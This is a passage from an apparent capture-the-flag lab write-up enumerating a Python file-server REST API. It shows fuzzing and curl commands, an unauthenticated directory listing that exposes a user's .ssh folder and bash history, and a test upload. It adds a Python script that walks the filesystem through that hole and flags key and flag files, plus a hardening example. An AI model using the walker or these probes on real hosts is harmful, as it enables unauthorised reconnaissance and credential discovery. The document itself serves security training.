Web


Nmap discovered a web server on target port 33414. The running service is Werkzeug httpd 2.2.3 (Python 3.9.13).

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/amaterasu]
└─$ curl -I -X OPTIONS http://$IP:33414/
HTTP/1.1 404 NOT FOUND
Server: Werkzeug/2.2.3 Python/3.9.13
Date: Sun, 27 Apr 2025 12:02:37 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 207
Connection: close
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/amaterasu]
└─$ curl -I http://$IP:33414/        
HTTP/1.1 404 NOT FOUND
Server: Werkzeug/2.2.3 Python/3.9.13
Date: Sun, 27 Apr 2025 12:02:40 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 207
Connection: close

The webroot returns 404 for both GET and OPTIONS, so there is no default page to browse and content has to be discovered by fuzzing.

Wappalyzer identified the technologies involved.

Fuzzing


┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/amaterasu]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://$IP:33414/FUZZ -ic -e .html,.txt -fc 403
________________________________________________
 
 :: Method           : GET
 :: URL              : http://192.168.120.249:33414/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
 :: Extensions       : .html .txt 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 403
________________________________________________
help                    [Status: 200, Size: 137, Words: 19, Lines: 2, Duration: 28ms]
info                    [Status: 200, Size: 98, Words: 14, Lines: 2, Duration: 28ms]
:: Progress: [61434/61434] :: Job [1/1] :: 740 req/sec :: Duration: [0:01:22] :: Errors: 0 ::
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/amaterasu]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://$IP:33414/FUZZ/ -ic -fc 403
________________________________________________
 :: Method           : GET
 :: URL              : http://192.168.120.249:33414/FUZZ/
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 403
________________________________________________
:: Progress: [207630/207630] :: Job [1/1] :: 766 req/sec :: Duration: [0:04:50] :: Errors: 0 ::
Both wordlists surface only two endpoints (the directory-style run with a trailing slash finds nothing extra):

  • /help
  • /info

/info


┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/amaterasu]
└─$ curl -s http://$IP:33414/info | jq
[
  "Python File Server REST API v2.5",
  "Author: Alfredo Moroder",
  "GET /help = List of the commands"
]
  • The /info endpoint shows that this is a Python file server exposing a REST API
  • Possible username disclosure: Alfredo Moroder (author field)

/help


┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/amaterasu]
└─$ curl -s http://$IP:33414/help | jq
[
  "GET /info : General Info",
  "GET /help : This listing",
  "GET /file-list?dir=/tmp : List of the files",
  "POST /file-upload : Upload files"
]

The /help endpoint reveals two further API endpoints, one for listing files and one for uploading them:

  • /file-list?dir=
  • /file-upload

/file-list?dir=


┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/amaterasu]
└─$ curl -s http://$IP:33414/file-list?dir= | jq                      
[
  "flask.tar.gz",
  "systemd-private-aaf3eff3160545eab079c1428e55f60d-httpd.service-ahY8MS",
  "systemd-private-aaf3eff3160545eab079c1428e55f60d-ModemManager.service-yphYDm",
  "systemd-private-aaf3eff3160545eab079c1428e55f60d-systemd-logind.service-pY2DMM",
  "systemd-private-aaf3eff3160545eab079c1428e55f60d-chronyd.service-Wrr8N4",
  "systemd-private-aaf3eff3160545eab079c1428e55f60d-dbus-broker.service-EZf7Au",
  "systemd-private-aaf3eff3160545eab079c1428e55f60d-systemd-resolved.service-Hibhb0",
  "systemd-private-aaf3eff3160545eab079c1428e55f60d-systemd-oomd.service-yES4xZ"
]
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/amaterasu]
└─$ curl -s http://$IP:33414/file-list?dir=/home | jq 
[
  "alfredo"
]
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/amaterasu]
└─$ curl -s http://$IP:33414/file-list?dir=/home/alfredo | jq
[
  ".bash_logout",
  ".bash_profile",
  ".bashrc",
  "local.txt",
  ".ssh",
  "restapi",
  ".bash_history"
]

Directory listing is done through the /file-list?dir= endpoint. The dir parameter is not restricted to the /tmp example given in /help: any absolute path on the host is listed (here /home and /home/alfredo, including .ssh and .bash_history), and an empty value falls back to what looks like /tmp, judging by the systemd-private-* entries. This is an unauthenticated arbitrary directory listing.
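The enumeration above was done by hand, one curl per directory. The following script, an added example for this write-up and not code from the target's API or its author, turns the unrestricted /file-list?dir= endpoint into a recursive walk and flags entries worth a closer look. It assumes only what the page shows (the endpoint returns a JSON array of entry names and an empty dir= lists /tmp); FAKE_FS is a constructed mirror of the listings seen above so the walker runs offline, and the INTERESTING name list is a heuristic of my own.

```python
"""Map the unrestricted /file-list?dir= endpoint into a directory tree.

Added example for this write-up, not code from the target's REST API or its
author. It assumes only what the page shows: GET /file-list?dir=<path> returns
a JSON array of entry names and an empty dir= lists /tmp. FAKE_FS is a
constructed mirror of the listings above so the walker runs offline.
"""
import json
import sys
from urllib.error import HTTPError, URLError
from urllib.parse import quote
from urllib.request import urlopen

# Heuristic names worth a closer look on any host (assumption, extend to taste)
INTERESTING = {".ssh", ".bash_history", "local.txt", "proof.txt", "id_rsa", "authorized_keys"}


def http_fetch(base_url):
    """Build fetch(path) -> list[str] | None against a live target."""
    def fetch(path):
        url = f"{base_url}/file-list?dir={quote(path, safe='/')}"
        try:
            with urlopen(url, timeout=10) as resp:
                return json.load(resp)
        except (HTTPError, URLError, ValueError):
            return None  # error or non-JSON reply: treat as "not a directory"
    return fetch


def walk(fetch, root="/", max_depth=3, _depth=0):
    """Recursively list directories via fetch(). Anything that cannot be
    listed is assumed to be a file. Returns {dir_path: sorted(entries)}."""
    entries = fetch(root)
    if entries is None:
        return {}
    tree = {root: sorted(entries)}
    if _depth < max_depth:
        for name in entries:
            child = root.rstrip("/") + "/" + name
            tree.update(walk(fetch, child, max_depth, _depth + 1))
    return tree


def interesting_paths(tree):
    """Full paths of entries whose name is in INTERESTING."""
    return sorted(
        directory.rstrip("/") + "/" + name
        for directory, names in tree.items()
        for name in names
        if name in INTERESTING
    )


# Constructed stand-in for the target's filesystem (only what the page showed)
FAKE_FS = {
    "home": {
        "alfredo": {
            ".bash_logout": None, ".bash_profile": None, ".bashrc": None,
            "local.txt": None, ".ssh": {}, "restapi": {}, ".bash_history": None,
        }
    },
    "tmp": {"flask.tar.gz": None},
}


def fake_fetch(path):
    """Offline fetch(): dict nodes are directories, None nodes are files;
    an empty path behaves like /tmp, as the real endpoint did."""
    node = FAKE_FS
    for part in (path or "/tmp").split("/"):
        if part == "":
            continue
        if not isinstance(node, dict) or part not in node:
            return None
        node = node[part]
    return list(node) if isinstance(node, dict) else None


if __name__ == "__main__":
    # Usage: python3 walk.py [http://TARGET:33414]   (no argument = offline demo)
    fetch = http_fetch(sys.argv[1]) if len(sys.argv) > 1 else fake_fetch
    tree = walk(fetch, "/home", max_depth=2)
    for directory, names in tree.items():
        print(f"{directory}: {', '.join(names)}")
    for hit in interesting_paths(tree):
        print("interesting:", hit)
```

Keep max_depth small against a live host: the walker cannot tell files from directories without trying to list each one, so a deep walk from / costs one request per entry and will wander into /proc and /sys.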

/file-upload


┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/amaterasu]
└─$ curl -X POST http://$IP:33414/file-upload                                                                             
{"message":"No file part in the request"}

The returned error matches the error string of a widely copied Flask REST file-upload example (it is not from the official Flask documentation), which suggests the handler follows that pattern and expects a multipart form field named file.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/amaterasu]
└─$ curl -X POST  http://$IP:33414/file-upload -F "file=@test.txt" -F "filename=test.txt"                          
{"message":"File successfully uploaded"}
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/amaterasu]
└─$ curl -s http://$IP:33414/file-list?dir= | jq                                                                             
[
  "test.txt",
  "flask.tar.gz",
  "systemd-private-aaf3eff3160545eab079c1428e55f60d-httpd.service-ahY8MS",
  "systemd-private-aaf3eff3160545eab079c1428e55f60d-ModemManager.service-yphYDm",
  "systemd-private-aaf3eff3160545eab079c1428e55f60d-systemd-logind.service-pY2DMM",
  "vmware-root_782-2965579254",
  "systemd-private-aaf3eff3160545eab079c1428e55f60d-chronyd.service-Wrr8N4",
  "systemd-private-aaf3eff3160545eab079c1428e55f60d-dbus-broker.service-EZf7Au",
  "systemd-private-aaf3eff3160545eab079c1428e55f60d-systemd-resolved.service-Hibhb0",
  "systemd-private-aaf3eff3160545eab079c1428e55f60d-systemd-oomd.service-yES4xZ",
  ".Test-unix",
  ".font-unix",
  ".XIM-unix",
  ".ICE-unix",
  ".X11-unix"
]

File upload successful: test.txt now appears in the default listing, so the upload landed in the same directory the empty dir= listing shows (/tmp by appearance). The request also accepted a separate filename field; where that lets the upload be placed is the first thing to test next. Moving on to the Exploitation phase.
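For comparison, the following is an added example for this write-up, not the target's source (which the page never shows), contrasting the behaviour observed at /file-list?dir= and /file-upload with the checks that would have closed it off. weak_list() reproduces the listing behaviour seen from outside; confine(), safe_list() and safe_save() restrict both endpoints to one base directory. The Flask/Werkzeug request glue is left out so the logic runs without the framework, the STORE path is hypothetical, and make_demo_store() builds a constructed directory for the demo.

```python
"""Confining a file-list / file-upload API to one directory.

Added example for this write-up, not the target's source (the page never shows
it). weak_list() reproduces the behaviour observed from outside, where dir= is
handed to the listing as-is; confine(), safe_list() and safe_save() show the
checks that would close that off. The Flask/Werkzeug request glue is left out
so the logic runs without the framework, and the STORE path is hypothetical.
"""
import os
import re
import tempfile

STORE = "/srv/filestore"  # hypothetical base directory the API should be limited to
_SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$")


def weak_list(directory):
    """Observed behaviour: any dir= value is listed; an empty value falls back
    to /tmp (an assumption drawn from the /tmp-looking default listing)."""
    return os.listdir(directory or "/tmp")


def confine(base, requested):
    """Resolve `requested` relative to `base` and refuse anything that leaves
    it: absolute paths, '..' segments and symlinks that point outside."""
    base_real = os.path.realpath(base)
    if os.path.isabs(requested):
        raise PermissionError(f"absolute path refused: {requested!r}")
    target = os.path.realpath(os.path.join(base_real, requested))
    if os.path.commonpath([base_real, target]) != base_real:
        raise PermissionError(f"path escapes store: {requested!r}")
    return target


def escapes(base, requested):
    """True if confine() refuses the request."""
    try:
        confine(base, requested)
    except PermissionError:
        return True
    return False


def safe_list(base, requested=""):
    """Hardened listing: only directories inside `base`."""
    return sorted(os.listdir(confine(base, requested)))


def safe_filename(client_name):
    """Keep only the final path component and an allow-listed character set;
    dotfiles, separators and control characters are rejected (returns None)."""
    name = os.path.basename(client_name.replace("\\", "/"))
    return name if _SAFE_NAME.match(name) else None


def safe_save(base, client_name, data):
    """Hardened upload: sanitised name, written only inside `base`."""
    name = safe_filename(client_name)
    if name is None:
        raise ValueError(f"rejected filename: {client_name!r}")
    dest = confine(base, name)
    with open(dest, "wb") as fh:
        fh.write(data)
    return dest


def make_demo_store():
    """Constructed store for the demo: <tmp>/notes.txt and <tmp>/uploads/."""
    base = tempfile.mkdtemp(prefix="filestore-")
    os.mkdir(os.path.join(base, "uploads"))
    with open(os.path.join(base, "notes.txt"), "w") as fh:
        fh.write("demo\n")
    return base


if __name__ == "__main__":
    base = make_demo_store()
    print("weak_list('/'):", weak_list("/"))  # reads outside the store
    print("safe_list(base):", safe_list(base))
    for probe in ("uploads", "uploads/..", "../", "/home/alfredo", "uploads/../.."):
        print(f"{probe!r:>18} -> {'refused' if escapes(base, probe) else 'allowed'}")
    print("saved:", safe_save(base, "../../../test.txt", b"test"))
    print("safe_list(base):", safe_list(base))
```

The realpath/commonpath pair is what matters: it catches a `..` inside an otherwise normal-looking path and a symlink planted inside the store that points outside it, which a plain string-prefix check on the request misses. On the stack the target runs, Werkzeug's own `werkzeug.utils.secure_filename` and `werkzeug.utils.safe_join` helpers cover the same two jobs.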